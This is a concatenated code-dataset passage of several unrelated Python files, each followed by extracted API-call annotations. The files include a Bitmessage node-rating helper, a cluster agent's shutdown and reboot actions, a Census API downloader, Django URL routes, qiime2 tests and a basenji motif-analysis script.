ec='r', fc='none')\n", (6179, 6260), False, 'import matplotlib\n'), ((6314, 6419), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(exp_bbox[0], exp_bbox[1])', 'exp_bbox[2]', 'exp_bbox[3]'], {'ec': '"""b"""', 'fc': '"""none"""'}), "((exp_bbox[0], exp_bbox[1]), exp_bbox[2],\n exp_bbox[3], ec='b', fc='none')\n", (6342, 6419), False, 'import matplotlib\n'), ((6131, 6140), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6138, 6140), True, 'import matplotlib.pyplot as plt\n'), ((6294, 6303), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6301, 6303), True, 'import matplotlib.pyplot as plt\n'), ((6658, 6667), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6665, 6667), True, 'import matplotlib.pyplot as plt\n')]
import pickle import threading from bmconfigparser import BMConfigParser import state knownNodesLock = threading.Lock() knownNodes = {} knownNodesTrimAmount = 2000 def saveKnownNodes(dirName = None): if dirName is None: dirName = state.appdata with knownNodesLock: with open(dirName + 'knownnodes.dat', 'wb') as output: pickle.dump(knownNodes, output) def increaseRating(peer): increaseAmount = 0.1 maxRating = 1 with knownNodesLock: for stream in knownNodes.keys(): try: knownNodes[stream][peer]["rating"] = min(knownNodes[stream][peer]["rating"] + increaseAmount, maxRating) except KeyError: pass def decreaseRating(peer): decreaseAmount = 0.1 minRating = -1 with knownNodesLock: for stream in knownNodes.keys(): try: knownNodes[stream][peer]["rating"] = max(knownNodes[stream][peer]["rating"] - decreaseAmount, minRating) except KeyError: pass def trimKnownNodes(recAddrStream = 1): if len(knownNodes[recAddrStream]) < BMConfigParser().get("knownnodes", "maxnodes"): return with knownNodesLock: oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount] for oldest in oldestList: del knownNodes[recAddrStream][oldest]
[ "bmconfigparser.BMConfigParser", "threading.Lock", "pickle.dump" ]
[((105, 121), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (119, 121), False, 'import threading\n'), ((360, 391), 'pickle.dump', 'pickle.dump', (['knownNodes', 'output'], {}), '(knownNodes, output)\n', (371, 391), False, 'import pickle\n'), ((1121, 1137), 'bmconfigparser.BMConfigParser', 'BMConfigParser', ([], {}), '()\n', (1135, 1137), False, 'from bmconfigparser import BMConfigParser\n')]
# Copyright (c) 2018 DDN. All rights reserved. # Use of this source code is governed by a MIT-style # license that can be found in the LICENSE file. import os from chroma_agent.lib.shell import AgentShell from chroma_agent.log import console_log from chroma_agent.device_plugins.action_runner import CallbackAfterResponse from chroma_agent.lib.pacemaker import PacemakerConfig def ssi(runlevel): # force a manual failover by failing a node AgentShell.try_run(["sync"]) AgentShell.try_run(["sync"]) AgentShell.try_run(["init", runlevel]) def fail_node(): ssi("0") def stonith(node): p_cfg = PacemakerConfig() # TODO: signal that manager that a STONITH has been done so that it # doesn't treat it as an AWOL console_log.info("Rebooting %s per a STONITH request" % node) p_cfg.get_node(node).fence_reboot() def shutdown_server(halt=True, at_time="now"): def _shutdown(): console_log.info("Initiating server shutdown per manager request") # This will initiate a "nice" shutdown with a wall from root, etc. AgentShell.try_run(["shutdown", "-H" if halt else "-h", at_time]) console_log.info("Terminating") os._exit(0) raise CallbackAfterResponse(None, _shutdown) def reboot_server(at_time="now"): def _reboot(): console_log.info("Initiating server reboot per manager request") # reboot(8) just calls shutdown anyhow. AgentShell.try_run(["shutdown", "-r", at_time]) console_log.info("Terminating") os._exit(0) raise CallbackAfterResponse(None, _reboot) ACTIONS = [reboot_server, shutdown_server, fail_node, stonith]
[ "chroma_agent.lib.shell.AgentShell.try_run", "chroma_agent.lib.pacemaker.PacemakerConfig", "os._exit", "chroma_agent.log.console_log.info", "chroma_agent.device_plugins.action_runner.CallbackAfterResponse" ]
[((453, 481), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (471, 481), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((486, 514), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (504, 514), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((519, 557), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['init', runlevel]"], {}), "(['init', runlevel])\n", (537, 557), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((623, 640), 'chroma_agent.lib.pacemaker.PacemakerConfig', 'PacemakerConfig', ([], {}), '()\n', (638, 640), False, 'from chroma_agent.lib.pacemaker import PacemakerConfig\n'), ((758, 819), 'chroma_agent.log.console_log.info', 'console_log.info', (["('Rebooting %s per a STONITH request' % node)"], {}), "('Rebooting %s per a STONITH request' % node)\n", (774, 819), False, 'from chroma_agent.log import console_log\n'), ((1227, 1265), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_shutdown'], {}), '(None, _shutdown)\n', (1248, 1265), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((1570, 1606), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_reboot'], {}), '(None, _reboot)\n', (1591, 1606), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((939, 1005), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server shutdown per manager request"""'], {}), "('Initiating server shutdown per manager request')\n", (955, 1005), False, 'from chroma_agent.log import console_log\n'), ((1089, 1154), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-H' if halt else '-h', at_time]"], {}), "(['shutdown', '-H' if halt else '-h', at_time])\n", (1107, 1154), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1164, 1195), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1180, 1195), False, 'from chroma_agent.log import console_log\n'), ((1204, 1215), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1212, 1215), False, 'import os\n'), ((1329, 1393), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server reboot per manager request"""'], {}), "('Initiating server reboot per manager request')\n", (1345, 1393), False, 'from chroma_agent.log import console_log\n'), ((1450, 1497), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-r', at_time]"], {}), "(['shutdown', '-r', at_time])\n", (1468, 1497), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1507, 1538), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1523, 1538), False, 'from chroma_agent.log import console_log\n'), ((1547, 1558), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1555, 1558), False, 'import os\n')]
#! /usr/bin/env python # -*- coding: utf-8 -* """ A base class that governs how to download and process tables from a Census API table. """ import os import logging import pathlib from . import geotypes from . import decorators logger = logging.getLogger(__name__) class BaseTableConfig(object): """ Configures how to download and process tables from the Census API. """ THIS_DIR = pathlib.Path(__file__).parent PARENT_DIR = THIS_DIR.parent # All available years YEAR_LIST = [ 2017, 2016, 2015, 2014, 2013, 2012, 2011, 2010, 2009 ] # All available geographies GEOTYPE_LIST = ( "nationwide", "regions", "divisions", "states", "congressional_districts", "state_legislative_upper_districts", "state_legislative_lower_districts", "counties", "places", "urban_areas", "msas", "csas", "pumas", "nectas", "cnectas", "aiannh_homelands", "tracts", "zctas", "unified_school_districts", "elementary_school_districts", "secondary_school_districts" ) def __init__( self, api_key=None, source="acs5", years=None, data_dir=None, force=False ): """ Configuration. """ # Set the inputs self.CENSUS_API_KEY = os.getenv("CENSUS_API_KEY", api_key) if not self.CENSUS_API_KEY: raise NotImplementedError("Census API key required. Pass it as the first argument.") self.source = source self.force = force # # Allow custom years for data download, defaulting to most recent year # # If they want all the years, give it to them. if years == "all": self.years_to_download = self.YEAR_LIST # If the user provides a year give them that. elif isinstance(years, int): self.years_to_download = [years] # Or if they provide years as a list, give those then. elif isinstance(years, list): self.years_to_download = list(map(int, years)) # If they provided nothing, default to the latest year of data elif years is None: self.years_to_download = [max(self.YEAR_LIST), ] # Validate the years for year in self.years_to_download: if year not in self.YEAR_LIST: error_msg = ("Data only available for the years" f"{self.YEAR_LIST[-1]}-{self.YEAR_LIST[0]}.") raise NotImplementedError(error_msg) # Set the data directories if data_dir: self.data_dir = pathlib.Path(str(data_dir)) else: self.data_dir = self.PARENT_DIR.joinpath("data") self.raw_data_dir = self.data_dir.joinpath("raw") self.processed_data_dir = self.data_dir.joinpath("processed") # Make sure they exist if not self.data_dir.exists(): self.data_dir.mkdir() if not self.raw_data_dir.exists(): self.raw_data_dir.mkdir() if not self.processed_data_dir.exists(): self.processed_data_dir.mkdir() @property def censusreporter_url(self): """ Returns the URL of the Census Reporter page explaining the ACS table. """ return f"https://censusreporter.org/tables/{self.RAW_TABLE_NAME}/" # # Geotype downloaders # @decorators.downloader def download_nationwide(self): """ Download nationwide data. """ return geotypes.NationwideDownloader @decorators.downloader def download_regions(self): """ Download data for all regions. """ return geotypes.RegionsDownloader @decorators.downloader def download_divisions(self): """ Download data for all divisions. """ return geotypes.DivisionsDownloader @decorators.downloader def download_states(self): """ Download data for all states. """ return geotypes.StatesDownloader @decorators.downloader def download_congressional_districts(self): """ Download data for all Congressional districts. """ return geotypes.CongressionalDistrictsDownloader @decorators.downloader def download_state_legislative_upper_districts(self): """ Download data for all Census upper legislative districts in the provided state. """ return geotypes.StateLegislativeUpperDistrictsDownloader @decorators.downloader def download_state_legislative_lower_districts(self): """ Download data for all Census lower legislative districts in the provided state. """ return geotypes.StateLegislativeLowerDistrictsDownloader @decorators.downloader def download_counties(self): """ Download data for all counties. """ return geotypes.CountiesDownloader @decorators.downloader def download_places(self): """ Download data for all Census designated places. """ return geotypes.PlacesDownloader @decorators.downloader def download_urban_areas(self): """ Download data for all urban areas """ return geotypes.UrbanAreasDownloader @decorators.downloader def download_msas(self): """ Download data for Metropolitian Statistical Areas. """ return geotypes.MsasDownloader @decorators.downloader def download_csas(self): """ Download data for Combined Statistical Areas. """ return geotypes.CsasDownloader @decorators.downloader def download_pumas(self): """ Download data for Public Use Microdata Areas. """ return geotypes.PumasDownloader @decorators.downloader def download_nectas(self): """ Download data for New England cities and towns. """ return geotypes.NectasDownloader @decorators.downloader def download_cnectas(self): """ Download data for combined New England cities and towns. """ return geotypes.CnectasDownloader @decorators.downloader def download_aiannh_homelands(self): """ Download data for American Indian home lands. """ return geotypes.AiannhHomelandsDownloader @decorators.downloader def download_tracts(self): """ Download data for all Census tracts in the provided state. """ return geotypes.TractsDownloader @decorators.downloader def download_zctas(self): """ Download data for Zip Code Tabulation Areas """ return geotypes.ZctasDownloader @decorators.downloader def download_unified_school_districts(self): """ Download data for unified school districts. """ return geotypes.UnifiedSchoolDistrictsDownloader @decorators.downloader def download_elementary_school_districts(self): """ Download data for elementary school districts. """ return geotypes.ElementarySchoolDistrictsDownloader @decorators.downloader def download_secondary_school_districts(self): """ Download data for secondary school districts. """ return geotypes.SecondarySchoolDistrictsDownloader def download_everything(self): """ Download 'em all. """ for geo in self.GEOTYPE_LIST: print(geo) # Get the downloader function dl = getattr(self, f"download_{geo}", None) # Validate it if not dl or not callable(dl): raise NotImplementedError(f"Invalid geography type: {geo}") # Run it try: dl() except NotImplementedError: pass
[ "logging.getLogger", "os.getenv", "pathlib.Path" ]
[((237, 264), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (254, 264), False, 'import logging\n'), ((400, 422), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (412, 422), False, 'import pathlib\n'), ((1474, 1510), 'os.getenv', 'os.getenv', (['"""CENSUS_API_KEY"""', 'api_key'], {}), "('CENSUS_API_KEY', api_key)\n", (1483, 1510), False, 'import os\n')]
from django.conf.urls import include, url from . import views urlpatterns = [ url(r'^settings$', views.household_dashboard, name='household_dashboard'), url(r'^myinfo$', views.my_info, name='my_info'), url(r'^profile$', views.household_profile, name='maintain_household'), url(r'^members$', views.household_members, name='maintain_members'), url(r'^vehicles$', views.household_vehicles, name='maintain_vehicles'), url(r'^ajax/models-by-make/(?P<make_id>\d+)/$', views.ajax_models_by_make), url(r'^ajax/makes-by-type/(?P<type_id>\d+)/$', views.ajax_makes_by_type), url(r'^ajax/add-make/(?P<type_key>\d+)/(?P<make>[\w ]{1,50})/$', views.ajax_add_make), url(r'^ajax/add-model/(?P<make_key>\d+)/(?P<model>[\w -]{1,128})/$', views.ajax_add_model), url(r'^ajax/delete-invite/$', views.ajax_delete_invite), url(r'^ajax/change-member-status/$', views.ajax_change_member_status), ]
[ "django.conf.urls.url" ]
[((83, 155), 'django.conf.urls.url', 'url', (['"""^settings$"""', 'views.household_dashboard'], {'name': '"""household_dashboard"""'}), "('^settings$', views.household_dashboard, name='household_dashboard')\n", (86, 155), False, 'from django.conf.urls import include, url\n'), ((162, 208), 'django.conf.urls.url', 'url', (['"""^myinfo$"""', 'views.my_info'], {'name': '"""my_info"""'}), "('^myinfo$', views.my_info, name='my_info')\n", (165, 208), False, 'from django.conf.urls import include, url\n'), ((215, 283), 'django.conf.urls.url', 'url', (['"""^profile$"""', 'views.household_profile'], {'name': '"""maintain_household"""'}), "('^profile$', views.household_profile, name='maintain_household')\n", (218, 283), False, 'from django.conf.urls import include, url\n'), ((290, 356), 'django.conf.urls.url', 'url', (['"""^members$"""', 'views.household_members'], {'name': '"""maintain_members"""'}), "('^members$', views.household_members, name='maintain_members')\n", (293, 356), False, 'from django.conf.urls import include, url\n'), ((363, 432), 'django.conf.urls.url', 'url', (['"""^vehicles$"""', 'views.household_vehicles'], {'name': '"""maintain_vehicles"""'}), "('^vehicles$', views.household_vehicles, name='maintain_vehicles')\n", (366, 432), False, 'from django.conf.urls import include, url\n'), ((439, 513), 'django.conf.urls.url', 'url', (['"""^ajax/models-by-make/(?P<make_id>\\\\d+)/$"""', 'views.ajax_models_by_make'], {}), "('^ajax/models-by-make/(?P<make_id>\\\\d+)/$', views.ajax_models_by_make)\n", (442, 513), False, 'from django.conf.urls import include, url\n'), ((519, 591), 'django.conf.urls.url', 'url', (['"""^ajax/makes-by-type/(?P<type_id>\\\\d+)/$"""', 'views.ajax_makes_by_type'], {}), "('^ajax/makes-by-type/(?P<type_id>\\\\d+)/$', views.ajax_makes_by_type)\n", (522, 591), False, 'from django.conf.urls import include, url\n'), ((597, 688), 'django.conf.urls.url', 'url', (['"""^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$"""', 'views.ajax_add_make'], {}), "('^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$', views.\n ajax_add_make)\n", (600, 688), False, 'from django.conf.urls import include, url\n'), ((688, 784), 'django.conf.urls.url', 'url', (['"""^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$"""', 'views.ajax_add_model'], {}), "('^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$', views\n .ajax_add_model)\n", (691, 784), False, 'from django.conf.urls import include, url\n'), ((784, 838), 'django.conf.urls.url', 'url', (['"""^ajax/delete-invite/$"""', 'views.ajax_delete_invite'], {}), "('^ajax/delete-invite/$', views.ajax_delete_invite)\n", (787, 838), False, 'from django.conf.urls import include, url\n'), ((845, 913), 'django.conf.urls.url', 'url', (['"""^ajax/change-member-status/$"""', 'views.ajax_change_member_status'], {}), "('^ajax/change-member-status/$', views.ajax_change_member_status)\n", (848, 913), False, 'from django.conf.urls import include, url\n')]
# ---------------------------------------------------------------------------- # Copyright (c) 2016-2018, QIIME 2 development team. # # Distributed under the terms of the Modified BSD License. # # The full license is in the file LICENSE, distributed with this software. # ---------------------------------------------------------------------------- from unittest import TestCase, main import qiime2 import os from q2_qemistree import MGFDirFmt, SiriusDirFmt, ZodiacDirFmt, OutputDirs from q2_qemistree import (compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints) from q2_qemistree._fingerprint import artifactory class FingerprintTests(TestCase): def setUp(self): THIS_DIR = os.path.dirname(os.path.abspath(__file__)) self.badsirpath = os.path.join(THIS_DIR, 'data/foo/bin') self.goodsirpath = os.path.join(THIS_DIR, 'data/' 'sirius-linux64-headless-4.0.1/bin') # MassSpectrometryFeatures self.ions = qiime2.Artifact.load(os.path.join(THIS_DIR, 'data/sirius.mgf.qza')) # SiriusFolder self.sirout = qiime2.Artifact.load(os.path.join(THIS_DIR, 'data/sirFolder.qza')) # ZodiacFolder self.zodout = qiime2.Artifact.load(os.path.join(THIS_DIR, 'data/zodFolder.qza')) def test_artifactory(self): # everything is working fine obs = os.environ.get('_JAVA_OPTIONS', '') res = artifactory(self.goodsirpath, ['--help'], constructor=OutputDirs, java_flags='-Xms2G') self.assertEqual(obs, os.environ.get('_JAVA_OPTIONS')) self.assertTrue(isinstance(res, OutputDirs)) # exceptions are raised with self.assertRaises(OSError): res = artifactory(self.badsirpath, ['--help'], constructor=OutputDirs) def test_fragmentation_trees(self): ions = self.ions.view(MGFDirFmt) result = compute_fragmentation_trees(sirius_path=self.goodsirpath, features=ions, ppm_max=15, profile='orbitrap') contents = os.listdir(result.get_path()) self.assertTrue(('version.txt' in contents)) def test_fragmentation_trees_negative_ionization(self): ions = self.ions.view(MGFDirFmt) result = compute_fragmentation_trees(sirius_path=self.goodsirpath, features=ions, ppm_max=15, profile='orbitrap', ionization_mode='negative') contents = os.listdir(result.get_path()) self.assertTrue(('version.txt' in contents)) def test_fragmentation_trees_exception(self): ions = self.ions.view(MGFDirFmt) with self.assertRaises(ValueError): compute_fragmentation_trees(sirius_path=self.goodsirpath, features=ions, ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3') def test_reranking(self): ions = self.ions.view(MGFDirFmt) sirout = self.sirout.view(SiriusDirFmt) result = rerank_molecular_formulas(sirius_path=self.goodsirpath, fragmentation_trees=sirout, features=ions) contents = os.listdir(result.get_path()) self.assertTrue(('zodiac_summary.csv' in contents)) def test_fingerid(self): zodout = self.zodout.view(ZodiacDirFmt) result = predict_fingerprints(sirius_path=self.goodsirpath, molecular_formulas=zodout, ppm_max=15) contents = os.listdir(result.get_path()) self.assertTrue(('summary_csi_fingerid.csv' in contents)) if __name__ == '__main__': main()
[ "q2_qemistree.rerank_molecular_formulas", "os.path.join", "os.environ.get", "q2_qemistree.predict_fingerprints", "q2_qemistree.compute_fragmentation_trees", "unittest.main", "q2_qemistree._fingerprint.artifactory", "os.path.abspath" ]
[((4200, 4206), 'unittest.main', 'main', ([], {}), '()\n', (4204, 4206), False, 'from unittest import TestCase, main\n'), ((836, 874), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/foo/bin"""'], {}), "(THIS_DIR, 'data/foo/bin')\n", (848, 874), False, 'import os\n'), ((902, 966), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius-linux64-headless-4.0.1/bin"""'], {}), "(THIS_DIR, 'data/sirius-linux64-headless-4.0.1/bin')\n", (914, 966), False, 'import os\n'), ((1607, 1642), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""', '""""""'], {}), "('_JAVA_OPTIONS', '')\n", (1621, 1642), False, 'import os\n'), ((1657, 1747), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.goodsirpath', "['--help']"], {'constructor': 'OutputDirs', 'java_flags': '"""-Xms2G"""'}), "(self.goodsirpath, ['--help'], constructor=OutputDirs,\n java_flags='-Xms2G')\n", (1668, 1747), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((2171, 2279), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap')\n", (2198, 2279), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((2587, 2723), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""negative"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='negative')\n", (2614, 2723), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3535, 3638), 'q2_qemistree.rerank_molecular_formulas', 'rerank_molecular_formulas', ([], {'sirius_path': 'self.goodsirpath', 'fragmentation_trees': 'sirout', 'features': 'ions'}), '(sirius_path=self.goodsirpath, fragmentation_trees\n =sirout, features=ions)\n', (3560, 3638), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3924, 4018), 'q2_qemistree.predict_fingerprints', 'predict_fingerprints', ([], {'sirius_path': 'self.goodsirpath', 'molecular_formulas': 'zodout', 'ppm_max': '(15)'}), '(sirius_path=self.goodsirpath, molecular_formulas=\n zodout, ppm_max=15)\n', (3944, 4018), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((783, 808), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (798, 808), False, 'import os\n'), ((1086, 1131), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius.mgf.qza"""'], {}), "(THIS_DIR, 'data/sirius.mgf.qza')\n", (1098, 1131), False, 'import os\n'), ((1253, 1297), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirFolder.qza"""'], {}), "(THIS_DIR, 'data/sirFolder.qza')\n", (1265, 1297), False, 'import os\n'), ((1421, 1465), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/zodFolder.qza"""'], {}), "(THIS_DIR, 'data/zodFolder.qza')\n", (1433, 1465), False, 'import os\n'), ((1800, 1831), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""'], {}), "('_JAVA_OPTIONS')\n", (1814, 1831), False, 'import os\n'), ((1977, 2041), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.badsirpath', "['--help']"], {'constructor': 'OutputDirs'}), "(self.badsirpath, ['--help'], constructor=OutputDirs)\n", (1988, 2041), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((3105, 3241), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""n3gativ3"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3')\n", (3132, 3241), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n')]
#!/usr/bin/env python # Copyright 2017 Calico LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # https://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ========================================================================= from __future__ import print_function from optparse import OptionParser import copy, os, pdb, random, shutil, subprocess, time import h5py import matplotlib matplotlib.use('PDF') import matplotlib.pyplot as plt import numpy as np import pandas as pd from scipy.stats import spearmanr import seaborn as sns from sklearn import preprocessing import tensorflow as tf import basenji ''' basenji_motifs.py Collect statistics and make plots to explore the first convolution layer of the given model using the given sequences. ''' weblogo_opts = '-X NO -Y NO --errorbars NO --fineprint ""' weblogo_opts += ' -C "#CB2026" A A' weblogo_opts += ' -C "#34459C" C C' weblogo_opts += ' -C "#FBB116" G G' weblogo_opts += ' -C "#0C8040" T T' ################################################################################ # main ################################################################################ def main(): usage = 'usage: %prog [options] <params_file> <model_file> <data_file>' parser = OptionParser(usage) parser.add_option( '-a', dest='act_t', default=0.5, type='float', help= 'Activation threshold (as proportion of max) to consider for PWM [Default: %default]' ) parser.add_option( '-d', dest='model_hdf5_file', default=None, help='Pre-computed model output as HDF5.') parser.add_option('-o', dest='out_dir', default='.') parser.add_option( '-m', dest='meme_db', default='%s/data/motifs/Homo_sapiens.meme' % os.environ['BASENJIDIR'], help='MEME database used to annotate motifs') parser.add_option( '-p', dest='plot_heats', default=False, action='store_true', help= 'Plot heat maps describing filter activations in the test sequences [Default: %default]' ) parser.add_option( '-s', dest='sample', default=None, type='int', help='Sample sequences from the test set [Default:%default]') parser.add_option( '-t', dest='trim_filters', default=False, action='store_true', help='Trim uninformative positions off the filter ends [Default: %default]' ) (options, args) = parser.parse_args() if len(args) != 3: parser.error( 'Must provide Basenji parameters and model files and test data in HDF5' ' format.' ) else: params_file = args[0] model_file = args[1] data_file = args[2] if not os.path.isdir(options.out_dir): os.mkdir(options.out_dir) ################################################################# # load data data_open = h5py.File(data_file) test_seqs1 = data_open['test_in'] test_targets = data_open['test_out'] try: target_names = list(data_open['target_labels']) except KeyError: target_names = ['t%d' % ti for ti in range(test_targets.shape[1])] if options.sample is not None: # choose sampled indexes sample_i = sorted(random.sample(range(test_seqs1.shape[0]), options.sample)) # filter test_seqs1 = test_seqs1[sample_i] test_targets = test_targets[sample_i] # convert to letters test_seqs = basenji.dna_io.hot1_dna(test_seqs1) ################################################################# # model parameters and placeholders job = basenji.dna_io.read_job_params(params_file) job['seq_length'] = test_seqs1.shape[1] job['seq_depth'] = test_seqs1.shape[2] job['num_targets'] = test_targets.shape[2] job['target_pool'] = int(np.array(data_open.get('pool_width', 1))) t0 = time.time() dr = basenji.seqnn.SeqNN() dr.build(job) print('Model building time %ds' % (time.time() - t0)) # adjust for fourier job['fourier'] = 'train_out_imag' in data_open if job['fourier']: test_targets_imag = data_open['test_out_imag'] if options.valid: test_targets_imag = data_open['valid_out_imag'] ################################################################# # predict # initialize batcher if job['fourier']: batcher_test = basenji.batcher.BatcherF( test_seqs1, test_targets, test_targets_imag, batch_size=dr.batch_size, pool_width=job['target_pool']) else: batcher_test = basenji.batcher.Batcher( test_seqs1, test_targets, batch_size=dr.batch_size, pool_width=job['target_pool']) # initialize saver saver = tf.train.Saver() with tf.Session() as sess: # load variables into session saver.restore(sess, model_file) # get weights filter_weights = sess.run(dr.filter_weights[0]) filter_weights = np.transpose(np.squeeze(filter_weights), [2, 1, 0]) print(filter_weights.shape) # test t0 = time.time() layer_filter_outs, _ = dr.hidden(sess, batcher_test, layers=[0]) filter_outs = layer_filter_outs[0] print(filter_outs.shape) # store useful variables num_filters = filter_weights.shape[0] filter_size = filter_weights.shape[2] ################################################################# # individual filter plots ################################################################# # also save information contents filters_ic = [] meme_out = meme_intro('%s/filters_meme.txt' % options.out_dir, test_seqs) for f in range(num_filters): print('Filter %d' % f) # plot filter parameters as a heatmap plot_filter_heat(filter_weights[f, :, :], '%s/filter%d_heat.pdf' % (options.out_dir, f)) # write possum motif file filter_possum(filter_weights[f, :, :], 'filter%d' % f, '%s/filter%d_possum.txt' % (options.out_dir, f), options.trim_filters) # plot weblogo of high scoring outputs plot_filter_logo( filter_outs[:, :, f], filter_size, test_seqs, '%s/filter%d_logo' % (options.out_dir, f), maxpct_t=options.act_t) # make a PWM for the filter filter_pwm, nsites = make_filter_pwm('%s/filter%d_logo.fa' % (options.out_dir, f)) if nsites < 10: # no information filters_ic.append(0) else: # compute and save information content filters_ic.append(info_content(filter_pwm)) # add to the meme motif file meme_add(meme_out, f, filter_pwm, nsites, options.trim_filters) meme_out.close() ################################################################# # annotate filters ################################################################# # run tomtom subprocess.call( 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' % (options.out_dir, options.out_dir, options.meme_db), shell=True) # read in annotations filter_names = name_filters( num_filters, '%s/tomtom/tomtom.txt' % options.out_dir, options.meme_db) ################################################################# # print a table of information ################################################################# table_out = open('%s/table.txt' % options.out_dir, 'w') # print header for later panda reading header_cols = ('', 'consensus', 'annotation', 'ic', 'mean', 'std') print('%3s %19s %10s %5s %6s %6s' % header_cols, file=table_out) for f in range(num_filters): # collapse to a consensus motif consensus = filter_motif(filter_weights[f, :, :]) # grab annotation annotation = '.' name_pieces = filter_names[f].split('_') if len(name_pieces) > 1: annotation = name_pieces[1] # plot density of filter output scores fmean, fstd = plot_score_density( np.ravel(filter_outs[:, :, f]), '%s/filter%d_dens.pdf' % (options.out_dir, f)) row_cols = (f, consensus, annotation, filters_ic[f], fmean, fstd) print('%-3d %19s %10s %5.2f %6.4f %6.4f' % row_cols, file=table_out) table_out.close() ################################################################# # global filter plots ################################################################# if options.plot_heats: # plot filter-sequence heatmap plot_filter_seq_heat(filter_outs, '%s/filter_seqs.pdf' % options.out_dir) # plot filter-segment heatmap plot_filter_seg_heat(filter_outs, '%s/filter_segs.pdf' % options.out_dir) plot_filter_seg_heat( filter_outs, '%s/filter_segs_raw.pdf' % options.out_dir, whiten=False) # plot filter-target correlation heatmap plot_target_corr(filter_outs, seq_targets, filter_names, target_names, '%s/filter_target_cors_mean.pdf' % options.out_dir, 'mean') plot_target_corr(filter_outs, seq_targets, filter_names, target_names, '%s/filter_target_cors_max.pdf' % options.out_dir, 'max') def get_motif_proteins(meme_db_file): """ Hash motif_id's to protein names using the MEME DB file """ motif_protein = {} for line in open(meme_db_file): a = line.split() if len(a) > 0 and a[0] == 'MOTIF': if a[2][0] == '(': motif_protein[a[1]] = a[2][1:a[2].find(')')] else: motif_protein[a[1]] = a[2] return motif_protein def 